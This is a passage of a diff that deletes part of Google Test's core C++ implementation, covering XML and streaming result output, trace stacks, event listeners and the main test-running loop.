-    if (unit_test.GetTestCase(i)->reportable_test_count() > 0)
-      PrintXmlTestCase(stream, *unit_test.GetTestCase(i));
-  }
-  *stream << "</" << kTestsuites << ">\n";
-}
-
-// Produces a string representing the test properties in a result as space
-// delimited XML attributes based on the property key="value" pairs.
-std::string XmlUnitTestResultPrinter::TestPropertiesAsXmlAttributes(
-    const TestResult& result) {
-  Message attributes;
-  for (int i = 0; i < result.test_property_count(); ++i) {
-    const TestProperty& property = result.GetTestProperty(i);
-    attributes << " " << property.key() << "="
-        << "\"" << EscapeXmlAttribute(property.value()) << "\"";
-  }
-  return attributes.GetString();
-}
-
-// End XmlUnitTestResultPrinter
-
-#if GTEST_CAN_STREAM_RESULTS_
-
-// Checks if str contains '=', '&', '%' or '\n' characters. If yes,
-// replaces them by "%xx" where xx is their hexadecimal value. For
-// example, replaces "=" with "%3D".  This algorithm is O(strlen(str))
-// in both time and space -- important as the input str may contain an
-// arbitrarily long test failure message and stack trace.
-string StreamingListener::UrlEncode(const char* str) {
-  string result;
-  result.reserve(strlen(str) + 1);
-  for (char ch = *str; ch != '\0'; ch = *++str) {
-    switch (ch) {
-      case '%':
-      case '=':
-      case '&':
-      case '\n':
-        result.append("%" + String::FormatByte(static_cast<unsigned char>(ch)));
-        break;
-      default:
-        result.push_back(ch);
-        break;
-    }
-  }
-  return result;
-}
-
-void StreamingListener::SocketWriter::MakeConnection() {
-  GTEST_CHECK_(sockfd_ == -1)
-      << "MakeConnection() can't be called when there is already a connection.";
-
-  addrinfo hints;
-  memset(&hints, 0, sizeof(hints));
-  hints.ai_family = AF_UNSPEC;    // To allow both IPv4 and IPv6 addresses.
-  hints.ai_socktype = SOCK_STREAM;
-  addrinfo* servinfo = NULL;
-
-  // Use the getaddrinfo() to get a linked list of IP addresses for
-  // the given host name.
-  const int error_num = getaddrinfo(
-      host_name_.c_str(), port_num_.c_str(), &hints, &servinfo);
-  if (error_num != 0) {
-    GTEST_LOG_(WARNING) << "stream_result_to: getaddrinfo() failed: "
-                        << gai_strerror(error_num);
-  }
-
-  // Loop through all the results and connect to the first we can.
-  for (addrinfo* cur_addr = servinfo; sockfd_ == -1 && cur_addr != NULL;
-       cur_addr = cur_addr->ai_next) {
-    sockfd_ = socket(
-        cur_addr->ai_family, cur_addr->ai_socktype, cur_addr->ai_protocol);
-    if (sockfd_ != -1) {
-      // Connect the client socket to the server socket.
-      if (connect(sockfd_, cur_addr->ai_addr, cur_addr->ai_addrlen) == -1) {
-        close(sockfd_);
-        sockfd_ = -1;
-      }
-    }
-  }
-
-  freeaddrinfo(servinfo);  // all done with this structure
-
-  if (sockfd_ == -1) {
-    GTEST_LOG_(WARNING) << "stream_result_to: failed to connect to "
-                        << host_name_ << ":" << port_num_;
-  }
-}
-
-// End of class Streaming Listener
-#endif  // GTEST_CAN_STREAM_RESULTS__
-
-// Class ScopedTrace
-
-// Pushes the given source file location and message onto a per-thread
-// trace stack maintained by Google Test.
-ScopedTrace::ScopedTrace(const char* file, int line, const Message& message)
-    GTEST_LOCK_EXCLUDED_(&UnitTest::mutex_) {
-  TraceInfo trace;
-  trace.file = file;
-  trace.line = line;
-  trace.message = message.GetString();
-
-  UnitTest::GetInstance()->PushGTestTrace(trace);
-}
-
-// Pops the info pushed by the c'tor.
-ScopedTrace::~ScopedTrace()
-    GTEST_LOCK_EXCLUDED_(&UnitTest::mutex_) {
-  UnitTest::GetInstance()->PopGTestTrace();
-}
-
-
-// class OsStackTraceGetter
-
-// Returns the current OS stack trace as an std::string.  Parameters:
-//
-//   max_depth  - the maximum number of stack frames to be included
-//                in the trace.
-//   skip_count - the number of top frames to be skipped; doesn't count
-//                against max_depth.
-//
-string OsStackTraceGetter::CurrentStackTrace(int /* max_depth */,
-                                             int /* skip_count */)
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  return "";
-}
-
-void OsStackTraceGetter::UponLeavingGTest()
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-}
-
-const char* const
-OsStackTraceGetter::kElidedFramesMarker =
-    "... " GTEST_NAME_ " internal frames ...";
-
-// A helper class that creates the premature-exit file in its
-// constructor and deletes the file in its destructor.
-class ScopedPrematureExitFile {
- public:
-  explicit ScopedPrematureExitFile(const char* premature_exit_filepath)
-      : premature_exit_filepath_(premature_exit_filepath) {
-    // If a path to the premature-exit file is specified...
-    if (premature_exit_filepath != NULL && *premature_exit_filepath != '\0') {
-      // create the file with a single "0" character in it.  I/O
-      // errors are ignored as there's nothing better we can do and we
-      // don't want to fail the test because of this.
-      FILE* pfile = posix::FOpen(premature_exit_filepath, "w");
-      fwrite("0", 1, 1, pfile);
-      fclose(pfile);
-    }
-  }
-
-  ~ScopedPrematureExitFile() {
-    if (premature_exit_filepath_ != NULL && *premature_exit_filepath_ != '\0') {
-      remove(premature_exit_filepath_);
-    }
-  }
-
- private:
-  const char* const premature_exit_filepath_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(ScopedPrematureExitFile);
-};
-
-}  // namespace internal
-
-// class TestEventListeners
-
-TestEventListeners::TestEventListeners()
-    : repeater_(new internal::TestEventRepeater()),
-      default_result_printer_(NULL),
-      default_xml_generator_(NULL) {
-}
-
-TestEventListeners::~TestEventListeners() { delete repeater_; }
-
-// Returns the standard listener responsible for the default console
-// output.  Can be removed from the listeners list to shut down default
-// console output.  Note that removing this object from the listener list
-// with Release transfers its ownership to the user.
-void TestEventListeners::Append(TestEventListener* listener) {
-  repeater_->Append(listener);
-}
-
-// Removes the given event listener from the list and returns it.  It then
-// becomes the caller's responsibility to delete the listener. Returns
-// NULL if the listener is not found in the list.
-TestEventListener* TestEventListeners::Release(TestEventListener* listener) {
-  if (listener == default_result_printer_)
-    default_result_printer_ = NULL;
-  else if (listener == default_xml_generator_)
-    default_xml_generator_ = NULL;
-  return repeater_->Release(listener);
-}
-
-// Returns repeater that broadcasts the TestEventListener events to all
-// subscribers.
-TestEventListener* TestEventListeners::repeater() { return repeater_; }
-
-// Sets the default_result_printer attribute to the provided listener.
-// The listener is also added to the listener list and previous
-// default_result_printer is removed from it and deleted. The listener can
-// also be NULL in which case it will not be added to the list. Does
-// nothing if the previous and the current listener objects are the same.
-void TestEventListeners::SetDefaultResultPrinter(TestEventListener* listener) {
-  if (default_result_printer_ != listener) {
-    // It is an error to pass this method a listener that is already in the
-    // list.
-    delete Release(default_result_printer_);
-    default_result_printer_ = listener;
-    if (listener != NULL)
-      Append(listener);
-  }
-}
-
-// Sets the default_xml_generator attribute to the provided listener.  The
-// listener is also added to the listener list and previous
-// default_xml_generator is removed from it and deleted. The listener can
-// also be NULL in which case it will not be added to the list. Does
-// nothing if the previous and the current listener objects are the same.
-void TestEventListeners::SetDefaultXmlGenerator(TestEventListener* listener) {
-  if (default_xml_generator_ != listener) {
-    // It is an error to pass this method a listener that is already in the
-    // list.
-    delete Release(default_xml_generator_);
-    default_xml_generator_ = listener;
-    if (listener != NULL)
-      Append(listener);
-  }
-}
-
-// Controls whether events will be forwarded by the repeater to the
-// listeners in the list.
-bool TestEventListeners::EventForwardingEnabled() const {
-  return repeater_->forwarding_enabled();
-}
-
-void TestEventListeners::SuppressEventForwarding() {
-  repeater_->set_forwarding_enabled(false);
-}
-
-// class UnitTest
-
-// Gets the singleton UnitTest object.  The first time this method is
-// called, a UnitTest object is constructed and returned.  Consecutive
-// calls will return the same object.
-//
-// We don't protect this under mutex_ as a user is not supposed to
-// call this before main() starts, from which point on the return
-// value will never change.
-UnitTest* UnitTest::GetInstance() {
-  // When compiled with MSVC 7.1 in optimized mode, destroying the
-  // UnitTest object upon exiting the program messes up the exit code,
-  // causing successful tests to appear failed.  We have to use a
-  // different implementation in this case to bypass the compiler bug.
-  // This implementation makes the compiler happy, at the cost of
-  // leaking the UnitTest object.
-
-  // CodeGear C++Builder insists on a public destructor for the
-  // default implementation.  Use this implementation to keep good OO
-  // design with private destructor.
-
-#if (_MSC_VER == 1310 && !defined(_DEBUG)) || defined(__BORLANDC__)
-  static UnitTest* const instance = new UnitTest;
-  return instance;
-#else
-  static UnitTest instance;
-  return &instance;
-#endif  // (_MSC_VER == 1310 && !defined(_DEBUG)) || defined(__BORLANDC__)
-}
-
-// Gets the number of successful test cases.
-int UnitTest::successful_test_case_count() const {
-  return impl()->successful_test_case_count();
-}
-
-// Gets the number of failed test cases.
-int UnitTest::failed_test_case_count() const {
-  return impl()->failed_test_case_count();
-}
-
-// Gets the number of all test cases.
-int UnitTest::total_test_case_count() const {
-  return impl()->total_test_case_count();
-}
-
-// Gets the number of all test cases that contain at least one test
-// that should run.
-int UnitTest::test_case_to_run_count() const {
-  return impl()->test_case_to_run_count();
-}
-
-// Gets the number of successful tests.
-int UnitTest::successful_test_count() const {
-  return impl()->successful_test_count();
-}
-
-// Gets the number of failed tests.
-int UnitTest::failed_test_count() const { return impl()->failed_test_count(); }
-
-// Gets the number of disabled tests that will be reported in the XML report.
-int UnitTest::reportable_disabled_test_count() const {
-  return impl()->reportable_disabled_test_count();
-}
-
-// Gets the number of disabled tests.
-int UnitTest::disabled_test_count() const {
-  return impl()->disabled_test_count();
-}
-
-// Gets the number of tests to be printed in the XML report.
-int UnitTest::reportable_test_count() const {
-  return impl()->reportable_test_count();
-}
-
-// Gets the number of all tests.
-int UnitTest::total_test_count() const { return impl()->total_test_count(); }
-
-// Gets the number of tests that should run.
-int UnitTest::test_to_run_count() const { return impl()->test_to_run_count(); }
-
-// Gets the time of the test program start, in ms from the start of the
-// UNIX epoch.
-internal::TimeInMillis UnitTest::start_timestamp() const {
-    return impl()->start_timestamp();
-}
-
-// Gets the elapsed time, in milliseconds.
-internal::TimeInMillis UnitTest::elapsed_time() const {
-  return impl()->elapsed_time();
-}
-
-// Returns true iff the unit test passed (i.e. all test cases passed).
-bool UnitTest::Passed() const { return impl()->Passed(); }
-
-// Returns true iff the unit test failed (i.e. some test case failed
-// or something outside of all tests failed).
-bool UnitTest::Failed() const { return impl()->Failed(); }
-
-// Gets the i-th test case among all the test cases. i can range from 0 to
-// total_test_case_count() - 1. If i is not in that range, returns NULL.
-const TestCase* UnitTest::GetTestCase(int i) const {
-  return impl()->GetTestCase(i);
-}
-
-// Returns the TestResult containing information on test failures and
-// properties logged outside of individual test cases.
-const TestResult& UnitTest::ad_hoc_test_result() const {
-  return *impl()->ad_hoc_test_result();
-}
-
-// Gets the i-th test case among all the test cases. i can range from 0 to
-// total_test_case_count() - 1. If i is not in that range, returns NULL.
-TestCase* UnitTest::GetMutableTestCase(int i) {
-  return impl()->GetMutableTestCase(i);
-}
-
-// Returns the list of event listeners that can be used to track events
-// inside Google Test.
-TestEventListeners& UnitTest::listeners() {
-  return *impl()->listeners();
-}
-
-// Registers and returns a global test environment.  When a test
-// program is run, all global test environments will be set-up in the
-// order they were registered.  After all tests in the program have
-// finished, all global test environments will be torn-down in the
-// *reverse* order they were registered.
-//
-// The UnitTest object takes ownership of the given environment.
-//
-// We don't protect this under mutex_, as we only support calling it
-// from the main thread.
-Environment* UnitTest::AddEnvironment(Environment* env) {
-  if (env == NULL) {
-    return NULL;
-  }
-
-  impl_->environments().push_back(env);
-  return env;
-}
-
-// Adds a TestPartResult to the current TestResult object.  All Google Test
-// assertion macros (e.g. ASSERT_TRUE, EXPECT_EQ, etc) eventually call
-// this to report their results.  The user code should use the
-// assertion macros instead of calling this directly.
-void UnitTest::AddTestPartResult(
-    TestPartResult::Type result_type,
-    const char* file_name,
-    int line_number,
-    const std::string& message,
-    const std::string& os_stack_trace) GTEST_LOCK_EXCLUDED_(mutex_) {
-  Message msg;
-  msg << message;
-
-  internal::MutexLock lock(&mutex_);
-  if (impl_->gtest_trace_stack().size() > 0) {
-    msg << "\n" << GTEST_NAME_ << " trace:";
-
-    for (int i = static_cast<int>(impl_->gtest_trace_stack().size());
-         i > 0; --i) {
-      const internal::TraceInfo& trace = impl_->gtest_trace_stack()[i - 1];
-      msg << "\n" << internal::FormatFileLocation(trace.file, trace.line)
-          << " " << trace.message;
-    }
-  }
-
-  if (os_stack_trace.c_str() != NULL && !os_stack_trace.empty()) {
-    msg << internal::kStackTraceMarker << os_stack_trace;
-  }
-
-  const TestPartResult result =
-    TestPartResult(result_type, file_name, line_number,
-                   msg.GetString().c_str());
-  impl_->GetTestPartResultReporterForCurrentThread()->
-      ReportTestPartResult(result);
-
-  if (result_type != TestPartResult::kSuccess) {
-    // gtest_break_on_failure takes precedence over
-    // gtest_throw_on_failure.  This allows a user to set the latter
-    // in the code (perhaps in order to use Google Test assertions
-    // with another testing framework) and specify the former on the
-    // command line for debugging.
-    if (GTEST_FLAG(break_on_failure)) {
-#if GTEST_OS_WINDOWS && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-      // Using DebugBreak on Windows allows gtest to still break into a debugger
-      // when a failure happens and both the --gtest_break_on_failure and
-      // the --gtest_catch_exceptions flags are specified.
-      DebugBreak();
-#else
-      // Dereference NULL through a volatile pointer to prevent the compiler
-      // from removing. We use this rather than abort() or __builtin_trap() for
-      // portability: Symbian doesn't implement abort() well, and some debuggers
-      // don't correctly trap abort().
-      *static_cast<volatile int*>(NULL) = 1;
-#endif  // GTEST_OS_WINDOWS
-    } else if (GTEST_FLAG(throw_on_failure)) {
-#if GTEST_HAS_EXCEPTIONS
-      throw internal::GoogleTestFailureException(result);
-#else
-      // We cannot call abort() as it generates a pop-up in debug mode
-      // that cannot be suppressed in VC 7.1 or below.
-      exit(1);
-#endif
-    }
-  }
-}
-
-// Adds a TestProperty to the current TestResult object when invoked from
-// inside a test, to current TestCase's ad_hoc_test_result_ when invoked
-// from SetUpTestCase or TearDownTestCase, or to the global property set
-// when invoked elsewhere.  If the result already contains a property with
-// the same key, the value will be updated.
-void UnitTest::RecordProperty(const std::string& key,
-                              const std::string& value) {
-  impl_->RecordProperty(TestProperty(key, value));
-}
-
-// Runs all tests in this UnitTest object and prints the result.
-// Returns 0 if successful, or 1 otherwise.
-//
-// We don't protect this under mutex_, as we only support calling it
-// from the main thread.
-int UnitTest::Run() {
-  const bool in_death_test_child_process =
-      internal::GTEST_FLAG(internal_run_death_test).length() > 0;
-
-  // Google Test implements this protocol for catching that a test
-  // program exits before returning control to Google Test:
-  //
-  //   1. Upon start, Google Test creates a file whose absolute path
-  //      is specified by the environment variable
-  //      TEST_PREMATURE_EXIT_FILE.
-  //   2. When Google Test has finished its work, it deletes the file.
-  //
-  // This allows a test runner to set TEST_PREMATURE_EXIT_FILE before
-  // running a Google-Test-based test program and check the existence
-  // of the file at the end of the test execution to see if it has
-  // exited prematurely.
-
-  // If we are in the child process of a death test, don't
-  // create/delete the premature exit file, as doing so is unnecessary
-  // and will confuse the parent process.  Otherwise, create/delete
-  // the file upon entering/leaving this function.  If the program
-  // somehow exits before this function has a chance to return, the
-  // premature-exit file will be left undeleted, causing a test runner
-  // that understands the premature-exit-file protocol to report the
-  // test as having failed.
-  const internal::ScopedPrematureExitFile premature_exit_file(
-      in_death_test_child_process ?
-      NULL : internal::posix::GetEnv("TEST_PREMATURE_EXIT_FILE"));
-
-  // Captures the value of GTEST_FLAG(catch_exceptions).  This value will be
-  // used for the duration of the program.
-  impl()->set_catch_exceptions(GTEST_FLAG(catch_exceptions));
-
-#if GTEST_HAS_SEH
-  // Either the user wants Google Test to catch exceptions thrown by the
-  // tests or this is executing in the context of death test child
-  // process. In either case the user does not want to see pop-up dialogs
-  // about crashes - they are expected.
-  if (impl()->catch_exceptions() || in_death_test_child_process) {
-# if !GTEST_OS_WINDOWS_MOBILE && !GTEST_OS_WINDOWS_PHONE && !GTEST_OS_WINDOWS_RT
-    // SetErrorMode doesn't exist on CE.
-    SetErrorMode(SEM_FAILCRITICALERRORS | SEM_NOALIGNMENTFAULTEXCEPT |
-                 SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX);
-# endif  // !GTEST_OS_WINDOWS_MOBILE
-
-# if (defined(_MSC_VER) || GTEST_OS_WINDOWS_MINGW) && !GTEST_OS_WINDOWS_MOBILE
-    // Death test children can be terminated with _abort().  On Windows,
-    // _abort() can show a dialog with a warning message.  This forces the
-    // abort message to go to stderr instead.
-    _set_error_mode(_OUT_TO_STDERR);
-# endif
-
-# if _MSC_VER >= 1400 && !GTEST_OS_WINDOWS_MOBILE
-    // In the debug version, Visual Studio pops up a separate dialog
-    // offering a choice to debug the aborted program. We need to suppress
-    // this dialog or it will pop up for every EXPECT/ASSERT_DEATH statement
-    // executed. Google Test will notify the user of any unexpected
-    // failure via stderr.
-    //
-    // VC++ doesn't define _set_abort_behavior() prior to the version 8.0.
-    // Users of prior VC versions shall suffer the agony and pain of
-    // clicking through the countless debug dialogs.
-    // TODO(vladl@google.com): find a way to suppress the abort dialog() in the
-    // debug mode when compiled with VC 7.1 or lower.
-    if (!GTEST_FLAG(break_on_failure))
-      _set_abort_behavior(
-          0x0,                                    // Clear the following flags:
-          _WRITE_ABORT_MSG | _CALL_REPORTFAULT);  // pop-up window, core dump.
-# endif
-  }
-#endif  // GTEST_HAS_SEH
-
-  return internal::HandleExceptionsInMethodIfSupported(
-      impl(),
-      &internal::UnitTestImpl::RunAllTests,
-      "auxiliary test code (environments or event listeners)") ? 0 : 1;
-}
-
-// Returns the working directory when the first TEST() or TEST_F() was
-// executed.
-const char* UnitTest::original_working_dir() const {
-  return impl_->original_working_dir_.c_str();
-}
-
-// Returns the TestCase object for the test that's currently running,
-// or NULL if no test is running.
-const TestCase* UnitTest::current_test_case() const
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  return impl_->current_test_case();
-}
-
-// Returns the TestInfo object for the test that's currently running,
-// or NULL if no test is running.
-const TestInfo* UnitTest::current_test_info() const
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  return impl_->current_test_info();
-}
-
-// Returns the random seed used at the start of the current test run.
-int UnitTest::random_seed() const { return impl_->random_seed(); }
-
-#if GTEST_HAS_PARAM_TEST
-// Returns ParameterizedTestCaseRegistry object used to keep track of
-// value-parameterized tests and instantiate and register them.
-internal::ParameterizedTestCaseRegistry&
-    UnitTest::parameterized_test_registry()
-        GTEST_LOCK_EXCLUDED_(mutex_) {
-  return impl_->parameterized_test_registry();
-}
-#endif  // GTEST_HAS_PARAM_TEST
-
-// Creates an empty UnitTest.
-UnitTest::UnitTest() {
-  impl_ = new internal::UnitTestImpl(this);
-}
-
-// Destructor of UnitTest.
-UnitTest::~UnitTest() {
-  delete impl_;
-}
-
-// Pushes a trace defined by SCOPED_TRACE() on to the per-thread
-// Google Test trace stack.
-void UnitTest::PushGTestTrace(const internal::TraceInfo& trace)
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  impl_->gtest_trace_stack().push_back(trace);
-}
-
-// Pops a trace from the per-thread Google Test trace stack.
-void UnitTest::PopGTestTrace()
-    GTEST_LOCK_EXCLUDED_(mutex_) {
-  internal::MutexLock lock(&mutex_);
-  impl_->gtest_trace_stack().pop_back();
-}
-
-namespace internal {
-
-UnitTestImpl::UnitTestImpl(UnitTest* parent)
-    : parent_(parent),
-      GTEST_DISABLE_MSC_WARNINGS_PUSH_(4355 /* using this in initializer */)
-      default_global_test_part_result_reporter_(this),
-      default_per_thread_test_part_result_reporter_(this),
-      GTEST_DISABLE_MSC_WARNINGS_POP_()
-      global_test_part_result_repoter_(
-          &default_global_test_part_result_reporter_),
-      per_thread_test_part_result_reporter_(
-          &default_per_thread_test_part_result_reporter_),
-#if GTEST_HAS_PARAM_TEST
-      parameterized_test_registry_(),
-      parameterized_tests_registered_(false),
-#endif  // GTEST_HAS_PARAM_TEST
-      last_death_test_case_(-1),
-      current_test_case_(NULL),
-      current_test_info_(NULL),
-      ad_hoc_test_result_(),
-      os_stack_trace_getter_(NULL),
-      post_flag_parse_init_performed_(false),
-      random_seed_(0),  // Will be overridden by the flag before first use.
-      random_(0),  // Will be reseeded before first use.
-      start_timestamp_(0),
-      elapsed_time_(0),
-#if GTEST_HAS_DEATH_TEST
-      death_test_factory_(new DefaultDeathTestFactory),
-#endif
-      // Will be overridden by the flag before first use.
-      catch_exceptions_(false) {
-  listeners()->SetDefaultResultPrinter(new PrettyUnitTestResultPrinter);
-}
-
-UnitTestImpl::~UnitTestImpl() {
-  // Deletes every TestCase.
-  ForEach(test_cases_, internal::Delete<TestCase>);
-
-  // Deletes every Environment.
-  ForEach(environments_, internal::Delete<Environment>);
-
-  delete os_stack_trace_getter_;
-}
-
-// Adds a TestProperty to the current TestResult object when invoked in a
-// context of a test, to current test case's ad_hoc_test_result when invoke
-// from SetUpTestCase/TearDownTestCase, or to the global property set
-// otherwise.  If the result already contains a property with the same key,
-// the value will be updated.
-void UnitTestImpl::RecordProperty(const TestProperty& test_property) {
-  std::string xml_element;
-  TestResult* test_result;  // TestResult appropriate for property recording.
-
-  if (current_test_info_ != NULL) {
-    xml_element = "testcase";
-    test_result = &(current_test_info_->result_);
-  } else if (current_test_case_ != NULL) {
-    xml_element = "testsuite";
-    test_result = &(current_test_case_->ad_hoc_test_result_);
-  } else {
-    xml_element = "testsuites";
-    test_result = &ad_hoc_test_result_;
-  }
-  test_result->RecordProperty(xml_element, test_property);
-}
-
-#if GTEST_HAS_DEATH_TEST
-// Disables event forwarding if the control is currently in a death test
-// subprocess. Must not be called before InitGoogleTest.
-void UnitTestImpl::SuppressTestEventsIfInSubprocess() {
-  if (internal_run_death_test_flag_.get() != NULL)
-    listeners()->SuppressEventForwarding();
-}
-#endif  // GTEST_HAS_DEATH_TEST
-
-// Initializes event listeners performing XML output as specified by
-// UnitTestOptions. Must not be called before InitGoogleTest.
-void UnitTestImpl::ConfigureXmlOutput() {
-  const std::string& output_format = UnitTestOptions::GetOutputFormat();
-  if (output_format == "xml") {
-    listeners()->SetDefaultXmlGenerator(new XmlUnitTestResultPrinter(
-        UnitTestOptions::GetAbsolutePathToOutputFile().c_str()));
-  } else if (output_format != "") {
-    printf("WARNING: unrecognized output format \"%s\" ignored.\n",
-           output_format.c_str());
-    fflush(stdout);
-  }
-}
-
-#if GTEST_CAN_STREAM_RESULTS_
-// Initializes event listeners for streaming test results in string form.
-// Must not be called before InitGoogleTest.
-void UnitTestImpl::ConfigureStreamingOutput() {
-  const std::string& target = GTEST_FLAG(stream_result_to);
-  if (!target.empty()) {
-    const size_t pos = target.find(':');
-    if (pos != std::string::npos) {
-      listeners()->Append(new StreamingListener(target.substr(0, pos),
-                                                target.substr(pos+1)));
-    } else {
-      printf("WARNING: unrecognized streaming target \"%s\" ignored.\n",
-             target.c_str());
-      fflush(stdout);
-    }
-  }
-}
-#endif  // GTEST_CAN_STREAM_RESULTS_
-
-// Performs initialization dependent upon flag values obtained in
-// ParseGoogleTestFlagsOnly.  Is called from InitGoogleTest after the call to
-// ParseGoogleTestFlagsOnly.  In case a user neglects to call InitGoogleTest
-// this function is also called from RunAllTests.  Since this function can be
-// called more than once, it has to be idempotent.
-void UnitTestImpl::PostFlagParsingInit() {
-  // Ensures that this function does not execute more than once.
-  if (!post_flag_parse_init_performed_) {
-    post_flag_parse_init_performed_ = true;
-
-#if GTEST_HAS_DEATH_TEST
-    InitDeathTestSubprocessControlInfo();
-    SuppressTestEventsIfInSubprocess();
-#endif  // GTEST_HAS_DEATH_TEST
-
-    // Registers parameterized tests. This makes parameterized tests
-    // available to the UnitTest reflection API without running
-    // RUN_ALL_TESTS.
-    RegisterParameterizedTests();
-
-    // Configures listeners for XML output. This makes it possible for users
-    // to shut down the default XML output before invoking RUN_ALL_TESTS.
-    ConfigureXmlOutput();
-
-#if GTEST_CAN_STREAM_RESULTS_
-    // Configures listeners for streaming test results to the specified server.
-    ConfigureStreamingOutput();
-#endif  // GTEST_CAN_STREAM_RESULTS_
-  }
-}
-
-// A predicate that checks the name of a TestCase against a known
-// value.
-//
-// This is used for implementation of the UnitTest class only.  We put
-// it in the anonymous namespace to prevent polluting the outer
-// namespace.
-//
-// TestCaseNameIs is copyable.
-class TestCaseNameIs {
- public:
-  // Constructor.
-  explicit TestCaseNameIs(const std::string& name)
-      : name_(name) {}
-
-  // Returns true iff the name of test_case matches name_.
-  bool operator()(const TestCase* test_case) const {
-    return test_case != NULL && strcmp(test_case->name(), name_.c_str()) == 0;
-  }
-
- private:
-  std::string name_;
-};
-
-// Finds and returns a TestCase with the given name.  If one doesn't
-// exist, creates one and returns it.  It's the CALLER'S
-// RESPONSIBILITY to ensure that this function is only called WHEN THE
-// TESTS ARE NOT SHUFFLED.
-//
-// Arguments:
-//
-//   test_case_name: name of the test case
-//   type_param:     the name of the test case's type parameter, or NULL if
-//                   this is not a typed or a type-parameterized test case.
-//   set_up_tc:      pointer to the function that sets up the test case
-//   tear_down_tc:   pointer to the function that tears down the test case
-TestCase* UnitTestImpl::GetTestCase(const char* test_case_name,
-                                    const char* type_param,
-                                    Test::SetUpTestCaseFunc set_up_tc,
-                                    Test::TearDownTestCaseFunc tear_down_tc) {
-  // Can we find a TestCase with the given name?
-  const std::vector<TestCase*>::const_iterator test_case =
-      std::find_if(test_cases_.begin(), test_cases_.end(),
-                   TestCaseNameIs(test_case_name));
-
-  if (test_case != test_cases_.end())
-    return *test_case;
-
-  // No.  Let's create one.
-  TestCase* const new_test_case =
-      new TestCase(test_case_name, type_param, set_up_tc, tear_down_tc);
-
-  // Is this a death test case?
-  if (internal::UnitTestOptions::MatchesFilter(test_case_name,
-                                               kDeathTestCaseFilter)) {
-    // Yes.  Inserts the test case after the last death test case
-    // defined so far.  This only works when the test cases haven't
-    // been shuffled.  Otherwise we may end up running a death test
-    // after a non-death test.
-    ++last_death_test_case_;
-    test_cases_.insert(test_cases_.begin() + last_death_test_case_,
-                       new_test_case);
-  } else {
-    // No.  Appends to the end of the list.
-    test_cases_.push_back(new_test_case);
-  }
-
-  test_case_indices_.push_back(static_cast<int>(test_case_indices_.size()));
-  return new_test_case;
-}
-
-// Helpers for setting up / tearing down the given environment.  They
-// are for use in the ForEach() function.
-static void SetUpEnvironment(Environment* env) { env->SetUp(); }
-static void TearDownEnvironment(Environment* env) { env->TearDown(); }
-
-// Runs all tests in this UnitTest object, prints the result, and
-// returns true if all tests are successful.  If any exception is
-// thrown during a test, the test is considered to be failed, but the
-// rest of the tests will still be run.
-//
-// When parameterized tests are enabled, it expands and registers
-// parameterized tests first in RegisterParameterizedTests().
-// All other functions called from RunAllTests() may safely assume that
-// parameterized tests are ready to be counted and run.
-bool UnitTestImpl::RunAllTests() {
-  // Makes sure InitGoogleTest() was called.
-  if (!GTestIsInitialized()) {
-    printf("%s",
-           "\nThis test program did NOT call ::testing::InitGoogleTest "
-           "before calling RUN_ALL_TESTS().  Please fix it.\n");
-    return false;
-  }
-
-  // Do not run any test if the --help flag was specified.
-  if (g_help_flag)
-    return true;
-
-  // Repeats the call to the post-flag parsing initialization in case the
-  // user didn't call InitGoogleTest.
-  PostFlagParsingInit();
-
-  // Even if sharding is not on, test runners may want to use the
-  // GTEST_SHARD_STATUS_FILE to query whether the test supports the sharding
-  // protocol.
-  internal::WriteToShardStatusFileIfNeeded();
-
-  // True iff we are in a subprocess for running a thread-safe-style
-  // death test.
-  bool in_subprocess_for_death_test = false;
-
-#if GTEST_HAS_DEATH_TEST
-  in_subprocess_for_death_test = (internal_run_death_test_flag_.get() != NULL);
-#endif  // GTEST_HAS_DEATH_TEST
-
-  const bool should_shard = ShouldShard(kTestTotalShards, kTestShardIndex,
-                                        in_subprocess_for_death_test);
-
-  // Compares the full test names with the filter to decide which
-  // tests to run.
-  const bool has_tests_to_run = FilterTests(should_shard
-                                              ? HONOR_SHARDING_PROTOCOL
-                                              : IGNORE_SHARDING_PROTOCOL) > 0;
-
-  // Lists the tests and exits if the --gtest_list_tests flag was specified.
-  if (GTEST_FLAG(list_tests)) {
-    // This must be called *after* FilterTests() has been called.
-    ListTestsMatchingFilter();
-    return true;
-  }
-
-  random_seed_ = GTEST_FLAG(shuffle) ?
-      GetRandomSeedFromFlag(GTEST_FLAG(random_seed)) : 0;
-
-  // True iff at least one test has failed.
-  bool failed = false;
-
-  TestEventListener* repeater = listeners()->repeater();
-
-  start_timestamp_ = GetTimeInMillis();
-  repeater->OnTestProgramStart(*parent_);
-
-  // How many times to repeat the tests?  We don't want to repeat them
-  // when we are inside the subprocess of a death test.
-  const int repeat = in_subprocess_for_death_test ? 1 : GTEST_FLAG(repeat);
-  // Repeats forever if the repeat count is negative.
-  const bool forever = repeat < 0;
-  for (int i = 0; forever || i != repeat; i++) {
-    // We want to preserve failures generated by ad-hoc test
-    // assertions executed before RUN_ALL_TESTS().
-    ClearNonAdHocTestResult();
-
-    const TimeInMillis start = GetTimeInMillis();
-
-    // Shuffles test cases and tests if requested.
-    if (has_tests_to_run && GTEST_FLAG(shuffle)) {
-      random()->Reseed(random_seed_);
-      // This should be done before calling OnTestIterationStart(),
-      // such that a test event listener can see the actual test order
-      // in the event.
-      ShuffleTests();
-    }
-
-    // Tells the unit test event listeners that the tests are about to start.
-    repeater->OnTestIterationStart(*parent_, i);
-
-    // Runs each test case if there is at least one test to run.
-    if (has_tests_to_run) {
-      // Sets up all environments beforehand.
-      repeater->OnEnvironmentsSetUpStart(*parent_);
-      ForEach(environments_, SetUpEnvironment);
-      repeater->OnEnvironmentsSetUpEnd(*parent_);
-
-      // Runs the tests only if there was no fatal failure during global
-      // set-up.
-      if (!Test::HasFatalFailure()) {
-        for (int test_index = 0; test_index < total_test_case_count();
-             test_index++) {
-          GetMutableTestCase(test_index)->Run();
-        }
-      }
-
-      // Tears down all environments in reverse order afterwards.
-      repeater->OnEnvironmentsTearDownStart(*parent_);
-      std::for_each(environments_.rbegin(), environments_.rend(),
